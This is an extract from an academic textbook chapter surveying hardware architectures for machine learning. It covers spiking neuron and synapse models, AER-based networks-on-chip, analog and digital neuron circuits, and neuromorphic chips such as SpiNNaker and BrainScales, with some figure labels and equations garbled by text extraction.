IEEE Computer Society Annual Symposium on VLSI, pp 565–570. https://doi.org/10.1109/
ISVLSI.2014.63
Wang Z, Karakonstantis G, Chattopadhyay A (2016) A low overhead error confinement method
based on application statistical characteristics. In: 2016 Design, Automation & Test in Europe
Conference & Exhibition (DATE), pp 1168–1171
Wirthlin MJ, Keller AM, McCloskey C, Ridd P, Lee D, Draper J (2016) SEU mitigation and
validation of the LEON3 soft processor using triple modular redundancy for space processing.
In: Proceedings of the 2016 ACM/SIGDA International Symposium on Field-Programmable
Gate Arrays, FPGA ’16. ACM, New York, pp 205–214. https://doi.org/10.1145/2847263.
2847278, http://doi.acm.org/10.1145/2847263.2847278
Wulf WA, McKee SA (1995) Hitting the memory wall: implications of the obvious. SIGARCH
Comput. Archit. News 23(1):20–24. https://doi.org/10.1145/216585.216588
Xiang Y, Chantem T, Dick RP, Hu XS, Shang L (2010) System-level reliability modeling for
mpsocs. In: 2010 IEEE/ACM/IFIP International Conference on Hardware/Software Codesign
and System Synthesis (CODES+ISSS), pp 297–306
Yoon DH, Erez M (2010) Virtualized and flexible ecc for main memory. In: Proceedings of
the Fifteenth Edition of ASPLOS on Architectural Support for Programming Languages and
Operating Systems, ASPLOS XV. ACM, New York, pp 397–408. https://doi.org/10.1145/
1736020.1736064, http://doi.acm.org/10.1145/1736020.1736064
Yuan G, Liao Z, Ma X, Cai Y, Kong Z, Shen X, Fu J, Li Z, Zhang C, Peng H, et al. (2021) Improving
DNN fault tolerance using weight pruning and differential crossbar mapping for ReRAM-based
edge AI. In: ISQED
Architectures for Machine Learning
10
Yongkui Yang, Chao Chen, and Zheng Wang
Contents
Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 322
Architectures for Neuromorphic Computing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 324
Biological Computing Models and Learning Methods . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 324
Microarchitecture for Neuromorphic Computing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 330
Circuit-Level Design Considerations . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 335
Prominent Neuromorphic Chips . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 343
SpiNNaker . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 343
Neurogrid . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 344
BrainScales . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 345
LaCSNN . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 345
TrueNorth . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 346
Loihi . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 347
ODIN . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 348
Tianjic . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 348
Architectures for Artificial Neural Networks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 349
Design Metrics for ANN Architectures . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 350
Design Abstractions and Trade-Offs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 355
Selective ANN Architectures and Circuits . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 357
Architectures for Classic Machine Learning . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 370
Conclusions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 371
References . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 372
Abstract
The term “artificial intelligence (AI)” was coined in 1956, and its development
has undergone periods of extreme hype and periods of strong disillusionment
since then. Today, AI has received tremendous attention from both academia
and industry, and it will remain one of the hottest topics in the foreseeable
future. A subset of AI named machine learning (ML) has achieved great success
throughout a huge variety of fields, such as computer vision, natural language
processing, and computer gaming. ML was first proposed to endow machine the
ability to imitate the learning process of the human brain using neuromorphic
models. However, the modelling complexity and limited computing capabilities
of machines hindered the development of ML in its early days. Benefiting
from the ever-growing computing power and availability of digital data, ML
has adopted both bio-inspired spiking neural network (SNN), or neuromorphic
computing, and practical artificial neural network (ANN), which have become
two of the top trending methods with outstanding results.
This chapter gives a brief overview of the state-of-the-art architectures and
circuits for ML. On the one hand, neuromorphic computing architectures
and accelerators are investigated, including bio-inspired computational models
and learning methods, microarchitecture, circuit-level design considerations, and
prominent neuromorphic chips. On the other hand, architectures for ANNs are
outlined, including essential design metrics on ANN accelerators and various
state-of-the-art ANN architectures and circuits.
Keywords
Introduction
Artificial intelligence (AI) is by far and will remain one of the hottest topics for
mankind. However, the enthusiasm of AI research was once significantly decreased
before the millennium, which is known as the “AI winter.” Despite many reasons for
such pessimism, the increased gap between the successful mathematical methods
and the difficulty of their deployment in the infrastructures was one of the root
causes. Particularly, AI methods generally thirst for huge computing power, which
was unable to be met in those days. Fortunately, interest and investment in AI
boomed again in the first decade of the twenty-first century, which largely attributed
to the advancement of semiconductor technology and computer architectures. The
intrinsic architectural parallelism and increased operating frequency in modern
computers met the high demands on the computing power of the previously invented
AI methods, especially for a subset of AI named machine learning.
Machine learning is referred to as “the study of computer algorithms that improve
automatically through experience” (Mitchell 1997), which was initially proposed
10 Architectures for Machine Learning 323
to let the machine imitate the learning procedure of the human brain. Therefore,
neuroscientists pioneered in the research of the connectivity and the structural and
functional organization of the cerebrum and reached the consensus that neuron
is the primitive element of the brain and the signals transmitted among neurons
are temporally discrete electrical potentials named as “spike.” This has given
the intuition that machines with learnability should be best designed following
the brain’s working principle, which opens the research field of bio-inspired or
neuromorphic computing. The first part of this chapter introduces the bio-inspired
computational models and learning methods, followed by their architectural and
circuit-level design considerations, and surveys prominent neuromorphic chips.
Nonetheless, the current biological neuron model is not yet precise, and the
topology of neurons’ interconnection is still under investigation. Computer scientists
proposed simplified neuron models and networks, namely, artificial neural network
(ANN), to solve application-oriented problems and have achieved tremendous suc-
cess in computer vision, natural language processing, and computer gaming. Instead
of asynchronous spike signals in neuromorphic computing, artificial neurons in
ANN process real values synchronously. After the year 2010, ANN has aggressively
grown larger and deeper with diverse computing patterns, which is also known as
“deep learning.” Admitting that ANN offers an alternative but much practical solu-
tion to endow machine intelligence, therefore, its applications are prevalent from
embedded devices to high-end servers. However, conventional central processing
units (CPU) are incapable to accelerate ANN’s huge and parallel structure, whereas
the graphical processing units (GPU) demonstrate poor energy efficiency and hence
uneconomical. To address this, customized ANN accelerators have been prototyped
from the year 2014 and since then heavily researched. Ventures such as NVIDIA,
Intel, and Google have all fabricated their ANN accelerators for both inference and
training and built various services on top. The second part of this chapter aims to
provide essential design metrics on ANN accelerators and surveys on state-of-the-
art ANN architectures and circuits.
Neuromorphic and ANN computing are far from defining the vast scope of
architectures for machine learning. Classic machine learning algorithms such as
support vector machine (SVM), and K-means, principal component analysis (PCA)
are widely adopted as functional kernels executing on CPU, whereas dedicated
architectures for those are relatively less explored. Due to the large volume of
published works, it is impractical to collect all designs and achieve absolute
exactness throughout this chapter. Nevertheless, we intend to provide a quick guide
for the readers and target continuous updates. As illustrated in Fig. 1, we categorize
machine learning architectures based on their implementing algorithms into bio-
inspired SNN, practical ANN, and classic ML designs. In this chapter, we first
illustrate SNN computing models and architectures. Afterwards, we explain design
metrics and present selective architectures for ANN. A brief overview on the designs
for classic machine learning is also discussed.
324 Y. Yang et al.
Dendrites
Soma
(cell body) Synapse
Axon
There are three main differences in computing principles between the brain
and ANN accelerators. First, the ANN processes information in precise multi-bit
values, while the brain processes spikes or events. Second, computation (i.e., the
neurons) and storage (i.e., the synapses) are co-located in the brain. By contrast,
the computation and storage in the ANN accelerator are separated. Third, the
connectivity of neurons in the brain is three-dimensional, which is much more
massive than that of the ANN accelerator.
Different neuron and synapse models have been proposed to describe the biolog-
ical behaviors at different levels of biological plausibility, while the neuromorphic
computing needs to mimic only the key parts which are essential for computation.
A typical neuromorphic computing model is shown in Fig. 4.
326 Y. Yang et al.
w1
w2 Vmem
V
thresh
w3 me
Synapse
me
Pre-synapc Neuron Post-synapc Neuron
Fig. 4 Typical neuromorphic computing model
where Vrest , Vthresh , and τ are the membrane’s resting potential, threshold, and
time-constant, respectively. wi is the weight of the synapse. The dynamics of LIF-
spiking neurons are shown in Fig. 5. Vi is the input synaptic voltage (the value
is a binarization, where 1 and 0 represent a fired spike is received and no spike
is received, respectively), and it will be summed until the neuron generates a
spike when membrane potential across the threshold Vthresh . A refractory period
is followed after spike generation, during which the membrane potential is kept
at resting potential Vrest , and the input voltage Vi will not be added during this
refractory period. This LIF model exhibits three neuro-computational properties,
i.e., tonic spiking, class 1 excitable, and integrator.
The QIF model, which is also known as the theta-neuron, is higher of biological
plausibility than LIF but also with higher hardware implementation cost. The QIF
model can be presented as Equation 2. Compared to LIF, QIF model exhibits
more neuro-computational properties like spike latency, threshold variability, and
bistability of resting.
τ dVdtmem = Vi wi − α(Vmem − Vrest )(Vmem − Vthresh ),
i (2)
Vmem = Vrest , if Vmem ≥ Vthresh
10 Architectures for Machine Learning 327
Vmem
Vthresh
Refractory Period
Pre Spike
Vrest
Post Spike
me
Δt =tpost-tpre
Fig. 5 The dynamics of LIF-spiking neurons
where mV stands for millivolt and U represents a membrane recovery variable that
provides negative feedback to membrane potential Vmem . With different values of
parameters a, b, Vrest , and d, this model exhibits different firing patterns. When the
membrane potential Vmem reaches 30mV , Vmem and U are reset to Vrest and U + d,
respectively.
Synapse Models The fired spikes in presynaptic neuron transit to the postsynaptic
neuron through synapses. In a neuromorphic computing accelerator, if the system
does not attempt to explicitly model synapse biological behavior such as plasticity
mechanism, the synapses are considered as scalar values or the weight that are
stored in the memory. For these accelerators without the plasticity mechanism, they
are not able to do training or learning. To mimic the learning mechanism of the
brain, the synapse model has to model the synapse biological behavior such as the
plasticity mechanism. This plasticity mechanism will modify the neuron’s strength
or the weight value over time. One of the most used synapse models with plasticity
mechanism is the spike-timing-dependent plasticity (STDP), and this biological
328 Y. Yang et al.
behavior has been observed around the year 1998 (Bi and Poo 1998). Specifically,
the weight of the synapse increases or be strengthened (“potentiated” in the field of
neuroscience technology) if the spike fired by the presynaptic neuron arrives within
a certain time window before the spike generation of the postsynaptic neuron. On
the contrary, the weight of the synapse decreases or be weakened (“depressed” in
the field of neuroscience technology) if the spike fired by the presynaptic neuron
arrives within a certain time window after the spike generation of the postsynaptic
neuron. STDP is also known as the unsupervised learning method in neuromorphic
computing, and more details about STDP will be described in the next paragraph
related to the learning method.
Learning Methods Currently, the effective learning or training methods for SNN
are spike-based supervised, unsupervised, and semi-supervised methods. For the
supervised learning methods, the data fed to SNN for training should be labeled.
ReSuMe, tempotron, and backpropagation are the typical spike-based supervised
learning methods. While inspired by the brain, the STDP-based algorithm is one
of the most used unsupervised learning methods. Semi-supervised methods, such
as spike-driven synaptic plasticity (SDSP), are less complex of implementation
than STDP. Supervised learning methods such as ReSuMe and tempotron can train
SNN with a single layer. But for complex neuromorphic computing like multilayer
SNN, supervised learning methods are not effective learning methods. Spike-based
backpropagation algorithm enables supervised learning for multilayer SNN, and
it has been widely used for feedforward SNNs. Similar to the backpropagation
in feedforward ANNs, the spike-based backpropagation algorithm (as shown in
Fig. 6) backpropagates the computed gradient for the weights of the network for
a single input-output example (here is spike train). However, unlike the ANN, the
fired spikes in SNN are non-derivable due to their discontinuity. To overcome this
difficulty, most works, such as SpikeProp (Bohte et al. 2002), Multi-SpikeProp
(Ghosh-Dastidar and Adeli 2009), and NormAD (Anwani and Rajendran 2015),
estimate a differentiable approximate function for the spikes, and thus, the gradient
descent can be performed.
The bio-inspired STDP-based learning method is a temporally asymmetric
form of the Hebbian learning rule, where the weight of synapses is updated
Other STDP variants with model reduction such as SDSP have also been studied.
The illustration of the SDSP-based learning method is shown in Fig. 8 and the
synaptic weight updates following the equation of Equation 5. Here, the a and b are
jump sizes, θm is the voltage threshold, and θ1 , θ2 , and θ3 are the thresholds on the
calcium variable. Different from the STDP learning method that relies on the relative
presynaptic neuron and postsynaptic neuron spike times, the SDSP learning method
updates the weight each time when a presynaptic neuron spike occurs. The synaptic
weight increases if the membrane potential at the time of presynaptic neuron spike
Δt =tpost-tpre
-b
Vmem < θm
330 Y. Yang et al.
Vmem (tpre ) is larger than the threshold θm , and if the calcium concentration Ca(tpre )
at the time of presynaptic neuron spike is between θ1 and θ3 , while the synaptic
weight decreases by b at the time of presynaptic neuron spike if VmemVmem (tpre )
is smaller than the threshold θm , and Ca(tpre ) is between θ1 and θ2 .
+a, if Vmem (tpre ) ≥ θm and θ1 ≤ Ca(tpre ) < θ3
Δw = (5)
−b, if Vmem (tpre ) < θm and θ1 ≤ Ca(tpre ) < θ2
Neuron
neuron, such as LIF, QIF, and Izhikevich. The crossbar array mimics the dense local
connectivity of neurons, and each cross-point in the crossbar array is the synapse
memory. Combined with the learning block, it mimics the biological synapse
behaviors like STDP and SDSP. The local storage elements in each neuromorphic
core are used to store the synaptic weight, lookup tables for routing information,
and local data. The peripheral circuitry implements the communication interface
and also the drive circuits that control the input wires (i.e., axons) and output wire
(i.e., dendrites).
(a) (b)
Fig. 11 2D-mesh routing scheme (a) with four cardinal, (b) with triangular facets
level of routers is connected with 2D-tree topology, while the low level of routers
is organized as 2D-mesh topology. The DYNAPs neuromorphic chip adopts this
hybrid routing scheme.
When compared to the network structure of the brain, the 2D NoC is still limited
to connectivity and throughput. 3D NoC which mimics the 3D structure in the brain
takes a step closer toward bio-plausible implementation. A 3D NoC, as shown in
Fig. 14, includes the vertical crossbar and the horizontal 2D NoC. This 3D NoC
improves the performance of the neuromorphic chip by shorter latency and higher
throughput. However, the state of the art of the 3D NoC still cannot be implemented
334 Y. Yang et al.
in a typical single silicon chip since the chip fabrication process is two-dimensional.
Take 3D NoC in LaCSNN neuromorphic chip, for example; it is built by vertically
stacking multiple FPGA boards through a high-speed Terasic connector (Yang et al.
2018).
AER Protocol Since the spiking rate of a biological neuron is much lower
than that of electronic circuits in orders of magnitude, and the biological axonal
delays and neuron time constants are larger than electronic circuits’ propagation
and transition delay, the NoC in the bio-inspired neuromorphic chip or SNN
accelerator normally uses address event representation (AER) protocol to transmit
communication packets from one neuromorphic core to another. Each neuron has a
unique address to enable communication base on the AER protocol. When a neuron
generates a spike or an event, this spike information including the spiking neuron
address and the time of spiking will be transmitted to the destination neurons.
A simplified AER-based communication system is shown in Fig. 15. Whenever
the neuron on the transmitter side generates a spike or an event, the spike
information including the corresponding neuron address that will be encoded and
sent over the data bus to the destination receiving neurons. The decoder of the
receiving neurons decodes the incoming AER packets and reconstructs the sequence
of the spikes. Therefore, in this basic AER-based communication system, the spike
is explicitly encoded by its address, while the time of spiking is implicitly encoded
by the time when its address is sent to the data bus.
When compared to the frame-driven approach of the ANN accelerator, this AER-
based NoC communication system of the SNN accelerator is easier to scale. It
is possible to connect any number of neuromorphic cores as long as the routers
can manage the communication packet of the AER protocol. Thus, AER-based
NoC is suitable for not only the on-chip communication but also the chip-to-chip
communication, enabling larger-scale design.
1 1
Decoder
Encoder
2 2 1 1 2
Time
N N
Transmier Receiver
Fig. 15 Simplified AER-based communication system
10 Architectures for Machine Learning 335
The main building blocks for the neuromorphic chip or SNN accelerator are
neuromorphic core and AER-based NoC. When implementing these building
blocks, the power-performance-area (PPA) is the main design consideration. It is
significant to choose a design technique that will not only mimic the behavior of the
biological brain but also with a good PPA (i.e., low power, high performance, and
small area). The state-of-the-art neurons are implemented using analog circuits or
digital circuits. Besides, to store synaptic weight and some local data, local memory
like SRAM has been employed in the neuromorphic cores, enabling near-memory
computing. Moreover, neurons and synapses can be implemented using memristive
technologies, which implement computing and storage in one memristive device,
while the AER NoC is normally implemented using digital circuits but can be either
synchronous or asynchronous circuit design technique.
Neurons Using Analog Circuits Various analog circuit designs could be used to
build a neuromorphic core including neuron and synapse, such as subthreshold
circuits, above-threshold circuits, switched-capacitor circuits, and so on. Metal
oxide semiconductor (MOS) transistors that operate in subthreshold or weak-
inversion regimes can be used to implement a first-order low-pass filter (LPF)
and thus can faithfully model bio-plausible temporal dynamics, since the current-
voltage characteristics of these transistors are exponential. For example, Fig. 16
shows the circuit schematic of the adaptive exponential IF neuron (Chicca et al.
2014). It consists of an input differential pair integrator as the LPF, a spike
generating amplifier, a spike reset circuit with refractory period functionality, and
a spike-frequency adaptation mechanism. MOS transistors ML1 − ML3 model
the leak conductance of the neuron, and they produce exponential subthreshold
Vdd Vdd
MG1 MA5 MA1 MR1 ACK
Vdd
Vahp MG2 REQ
Iin MA6 MR2
Vthrahp MG3 MG4 MA2
MR3
Vthr ML1 ML2
MG6 MA3 MR4
MG5 Vlkahp
Vlk
ML3 MR6 MA4 MR5 Vref
dynamics in response to constant input currents. The capacitor Cmem represents the
neuron’s membrane capacitance, and the activation and inactivation dynamics of the
sodium channel are modeled by the positive-feedback circuits, i.e., MOS transistors
MA1 − MA6 . The potassium conductance and refractory period functionality are
modeled by the MR1 − MR6 , while the spike-frequency adaptation mechanism is
implemented by the MG1 −MG6 . These MOS transistors model the neuron’s calcium
conductance which generates the after-hyperpolarizing current that is proportional
to the spike’s firing rate. There are many biases, such as the Vthr , Vlk , Vthrahp , Vahp ,
Vlkahp , and Vref , in this neuron circuit schematic that can be tuned. By changing
these biases that control the neuron’s time constants, refractory period, and spike-
frequency adaptation dynamics, this circuit can model different spiking behaviors
ranging from regular spiking to bursting.
Although the subthreshold circuits can be used to build biophysically realistic
models with ultralow power consumption (ranging from between fractions of
pico- to hundreds of nano-amperes) and realistic time constants, they suffer from
high device mismatch especially for the large-scale neuromorphic chip or SNN
accelerator. The neuromorphic core implemented by the above-threshold circuits
and switched-capacitor circuits are more robust but with higher power consumption
than that of subthreshold circuits. Figure 17 shows an example of the Izhikevich
neuron implemented by the above-threshold circuits (Wijekoon and Dudek 2008).
The voltages across capacitors Cv and Cu represent the membrane potential and
slow variable of the Izhikevich model, respectively. The MOS transistors M1 − M5
together with the membrane capacitor Cv construct the membrane potential circuits.
The input currents, the positive feedback current of M3 generated by spike, and the
M4 leakage modeling the recovery variable of Izhikevich neuron are integrated on
the membrane capacitor. The positive feedback current is generated by M1 which
is controlled approximately quadratically by the membrane potential and mirrored
by the current mirror (M2 − M3 ). When a spike is fired, the analog comparator
(M9 − M14 ) will generate a reset pulse on the gate of transistor M5 , and then the
membrane potential will be hyperpolarized to a voltage value determined by the
voltage at node c. Transistor M1 , M2 , M6 , M7 , and M8 built the slow variable
circuit, where the current of M7 is determined by the membrane potential and M6
Vdd
M2 M7 M8 M10 M9
M3 Spike M12 M11 Vth
M1
Cv M5
M4 M6 Cu M13 Vbias
c M14
Fig. 17 The Izhikevich neuron implemented by above-threshold circuits
10 Architectures for Machine Learning 337
Vthreset
ϕ1 A1 ϕ2 A1 Spike
Spike Vth Vdd
A2
ϕ1 ϕ2
ϕ1 ϕ2 SW3
Vth
Vmem EL ϕ1 A2 ϕ2 A2 Vthset
Reset SW2
SW1
Reset SW4
(a) (b)
Fig. 18 The Mihalas-Niebur neuron implemented by switched capacitor circuits (a) membrane
potential circuit, (b) adaptive threshold circuit
provides a nonlinear leakage current. The size of these transistors and the value of
the capacitors can be scaled to make the slow variable changes more slowly than the
membrane potential.
Switched-capacitor circuits have been widely used in analog circuits to realize
the variable resistor with a wide range of several orders of magnitude. This circuit
technique can also be used to build the neuron model. Figure 18 shows an example
of a switched-capacitor-based Mihalas-Niebur neuron that is a generalized version
of the LIF model with an adaptive threshold (Folowosele et al. 2009). It consists
of the membrane potential circuit (Fig. 18a) and the adaptive threshold circuit
(Fig. 18b). An analog comparator is used to compare the membrane potential Vmem
and the adaptive threshold Vth , and it will generate a spike when a membrane
potential larger than the threshold. When a spike is generated, the membrane
potential is reset to the resting potential determined by the voltage at node EL.
The switched-capacitor SW 1 switched by two nonoverlapping clocks φ1 and φ2 is
used to model the conductance. The voltage divided by the two variable resistors
realized by two switched-capacitor circuits in the adaptive threshold circuit block,
i.e., SW 3 and SW 4, is used to generate the adaptive threshold.
Besides the neuron, the analog circuits can also be used to model the biological
synapse. Figure 19 shows an example of STDP synapse using analog circuits
(Indiveri et al. 2006), which can emulate the weight update curves in Fig. 7. The
charge stored on the weight capacitor Cw represents the weight of each synapse,
and the strength of the weight is inversely proportional to the voltage Vw at the
capacitor. When the presynaptic neuron fires, i.e., the signal P re on the gate of
M1 0 is a pulse, the voltage VrLT P on the diode-connected transistor M9 is copied to
V2 , the gate voltage of M13 . The leakage current of M11 decays V2 with time from
its peak voltage. When the postsynaptic neuron fires, a spike or pulse turns on M12 .
Thus, the weight is potentiated (i.e., Vw decrease) by an amount that reflects the time
elapsed since the last presynaptic neuron spikes. Similarly, the weight is weakened
if the circuit detects a noncausal interaction between a presynaptic neuron and a
postsynaptic neuron-generated spike. When a postsynaptic neuron fires, a pulse on
the gate of M15 charges the voltage V1 . The charge on the capacitor Cdep leaks
338 Y. Yang et al.
Vdd
nPre M1 M4
Cw Ibdep
Vw VrLTD
M5
M2 M3
Idep Post
M6 Vr V1
Ibpot Pre M12 Post M17 M14
M15
VrLTP M16
V2 Vbdep
M10 M13 Cdep
M7 M8 Vbpot M11 Cpot
M9
through M16 . Then, a nonlinear current Idep is sent to decay the voltage Vw . When
the presynaptic neuron fired spike occurs soon enough after the postsynaptic neuron
spike, Vw is increased to supply voltage, i.e., the weight strength decreases.
The circuits described above, including subthreshold circuits, above-threshold
circuits, and switched-capacitor circuits show their ability to model different
neurons and synapses in the neuromorphic core. Analog circuits especially the
subthreshold circuits are suitable for modeling complex or biophysically realistic
models since the transistors working in the subthreshold regime have exponential
behaviors. However, compared to digital circuits, analog circuits tend to accumulate
errors easily and are much more prone to process-induced variations in chip
fabrication.
Neurons Using Digital Circuits Although the digital circuits, such as adders,
multipliers, counters, and SRAM cells, can model complex neuron and synapse
models, the computation tasks are heavy leading to a high cost of implementation.
The state-of-the-art neuromorphic core using digital circuits tends to model simple
biological dynamics like LIF. Both synchronous and asynchronous circuits have
been used to build the neuromorphic core. Thanks to the mature standard ASIC
design flow, most of the digital neuromorphic neurons are implemented using
synchronous circuits which operate based on the clock. A typical LIF digital neuron
using synchronous circuits is shown in Fig. 20. The integrator unit accumulates the
synaptic weight when a spike occurs, while a leak is reduced from the accumulated
membrane potential at every time tick. If the membrane potential value is equal
to or larger than the threshold value, a spike is generated and transmitted, and
the membrane potential is reset at the same time. The neuron operation proceeds
until every spike from the previous timesteps is processed. All of these operations
are updated at the rising or falling edge of the clock, i.e., the circuits operate
synchronously.
10 Architectures for Machine Learning 339
MUX
Tick
0
MUX
DFF Spike
-Leak Vth
Empty Full
Fill Drain
Weight/
Σ
Leak Spike
Vth
(b)
Fig. 21 (a) Click-based link-joint asynchronous circuit, (b) Neuromorphic core using a digital
asynchronous circuit
Pre-synapc
Neurons
Post-synapc
Neurons
10 Architectures for Machine Learning 341
data0
data1
Send Recv
ACK
Sending "0" Sending "1"
Latch
Data Latch Data
Latch Logic
In Out
Delay Cell
EN DEN
L.REQ R.REQ
Pulse Generator
L.ACK R.ACK
Verilog representations converted from CSP language are compatible with standard
EDA tools. These converted Verilog can be synthesized utilizing a standard-cell
library with the addition of some special customized cells, such as C-elements with
combinational keepers, and tuneable delay line cells. To facilitate convergent timing
closure, all timing constraints apply only to neighboring, physically proximate
pipeline stages at each level of layout hierarchy. Hence, there is no unique clock
distribution layout is required, and timing analysis is not needed for different
neuromorphic cores.
The logic simulation for asynchronous circuits is also important during chip
design. Production rule simulator (PRSIM) (Akopyan et al. 2015) has been devel-
oped for asynchronous circuits’ logic simulation. The input to PRSIM is a netlist
based on production rules, which can be viewed as a sequence of spikes in
neuromorphic computing. All spikes are stored in a queue, and a timestamp is
attached to the spike when its preconditions become true. If the timestamp of a
spike coincides with PRSIM’s running clock, the production rule (i.e., the spike) is
executed to verify correct circuit behavior.
Since Carver Mead initiated the field of neuromorphic engineering (Mead 1990),
there are many breakthroughs in neuromorphic computing. In this section, some
prominent neuromorphic chips or SNN accelerators will be described. In terms of
their main applications, the state-of-the-art neuromorphic chips can be divided into
two categories, i.e., to assist computational neuroscience in emulating brain activity
and to accelerate SNNs performing commercially important tasks like classification
and recognition. There are many large-scale neuromorphic chips with complex
neuronal mechanisms that have been built for simulation of the biological brain,
such as SpiNNaker, Neurogrid, BrainScales, LaCSNN, and so on. While there are
more and more neuromorphic chips, such as TrueNorth, Loihi, ODIN, Tianji, and so
forth, have been designed based on simplified neural and synaptic primitives (e.g.,
LIF neuron model and STDP synapse model) to perform commercial tasks.
SpiNNaker
SpiNNaker (Furber et al. 2014; Liu et al. 2018) is a large-scale digital neuromorphic
chip, which is a part of the Human Brain Project (HBP) and developed by the
University of Manchester. Instead of building custom circuits modeling the neuron
and synapse, SpiNNaker systems use processor core to model biologic behaviors,
approaching the complexity of the brain in real-time. Hence, the processor core
with some local memory can be used to simulate complex models of neurons (such
as LIF and Izhikevich) and synapses (such as STDP). The SpiNNaker is based
on massively parallel computation with up to one million processor cores. They
communicate with each other through very small packets but with high fan-in and
fan-out connectivity, which mimics the human brain. Besides, the SpiNNaker is an
event-driven system, where a message or event arriving at a processor core will
trigger an interrupt that queues the event for processing by that core. The system
has been designed to efficiently process small packets, which means it can keep the
event queue not much larger than one. Moreover, SpiNNaker provides a software
stack that can program the spiking network implemented with the PyNN (PyNN
is a Python library supporting the portability of network designs between various
neuronal simulators and hardware). Although SpiNNaker is highly programmable,
it is not energy efficient and not fast especially for simulating complex neurons and
synapses. The first generation of SpiNNaker is constructed from ARM968 processor
cores. Eighteen of these processor cores with 96 KB of local memory, a packet
router, and some other support peripherals are fabricated on a die. This die and
another die with a 128 MB low-power SDRAM as the shared memory are stacked
onto one package substrate and interconnected with gold wire bonding within a
chip. Forty-eight of such chips are assembled on one board, with up to 864 processor
cores. The chip-to-chip communication on the board is a custom protocol employing
344 Y. Yang et al.
Neurogrid
BrainScales
BrainScales system (Schemmel et al. 2010; Friedmann et al. 2016), partly supported
by the HBP, targets the emulation of most of the neural systems modeled in
contemporary computational neuroscience at accelerated time. Compared to the
biological real time, the acceleration factor of BrainScales ranges from 103 to
105 for spiking neural network emulations. In other words, to emulate 10,000 s
of biological behaviors, the BrainScales system only needs about 1 s. BrainScales
is designed based on analog/digital mixed-signal circuits. A complex biological
neuron model, i.e., the adaptive exponential IF model which can be parameterized
to exhibit diverse firing patterns, is implemented by the analog circuits. The
synapse and its plasticity function have been implemented by the analog/digital
mixed-signal circuits. The event-driven communication system is realized by the
asynchronous digital circuits. The smallest silicon block of the BrainScales system
is the High-Input Count Analog Neural Network (HiCANN) chip, consisting
of neuron block (up to 512 neurons), synapse array (up to 14,000 synapses),
routers for interconnections and other necessary supporting circuits. Multiple of
these HiCANN chips are wired directly on the silicon wafer without cutting it
into discrete elements to build the BrainScales system. The software/hardware
framework of BrainScales has been developed using PyNN, which allows users to
map spiking neural networks on the hardware for emulation. In the first generation
of BrainScales system, HiCANN chips are fabricated in 180 nm CMOS process
technology, in 2010. To realize wafer-scale integration 352 HiCANN chips on a
single wafer, containing 4 × 106 synapses and up to 180,000 neurons, are wired.
To enlarge the scale of the BrainScales system, wafer-to-wafer communication
is also supported through FPGAs and 1 or 10 Gbit Ethernet links. The second
generation of BrainScales system is designed based on 65 nm CMOS process
technology. By combining general-purpose processors with fully custom analog
circuits (correlation sensor block) on the die, it enables flexibility in implementable
synapse learning mechanisms while keeping high efficiency, which is the major
difference between the first and second generation of BrainScales. The correlation
sensor block measures the time interval between pre- and postsynaptic neuron
spikes. While the embedded processors can perform any functions that compute
updates to the synaptic weights from the information of the correlation sensor.
LaCSNN
LaCSNN (Yang et al. 2018) is a high biological realism neuromorphic chip system
implemented on FPGA with synchronous digital circuits. LaCSNN can simulate
large-scale conductance-based spiking neural networks in real time. At the cellular
level, the ionic channels, which play significant roles in neuronal activities, are
efficiently realized by using multiplier-less digital circuits (i.e., the lookup tables).
This implementation is based on a set of piecewise linear approximation-based
346 Y. Yang et al.
TrueNorth
Loihi
ODIN
Tianjic
for mapping. Tianjic chip consists of 156 FCores, containing approximately 40,000
LIF neurons and 10 million synapses. These FCores are connected through 2D mesh
NoC. The chip is fabricated using 28 nm processing technology with a chip area of
3.8 × 3.8 mm2. An unmanned bicycle system assembled with just one Tianjic chip
has shown that it can simultaneously accelerate versatile algorithms and models and,
thus, simultaneously perform multiple tasks including real-time object detection,
tracking, voice control, obstacle avoidance, and balance control.
Although neuromorphic computing with complex models that mimic the human
brain is a promising solution to future artificial intelligence, their practical appli-
cation remains limited. For example, the accuracy of neuromorphic computing is
still lower than that of the Artificial Neural Network (ANN) when performing
commercial tasks; most of the conventional computing or storing products are real-
valued-based hardware, which is not well suited for the event-based neuromorphic
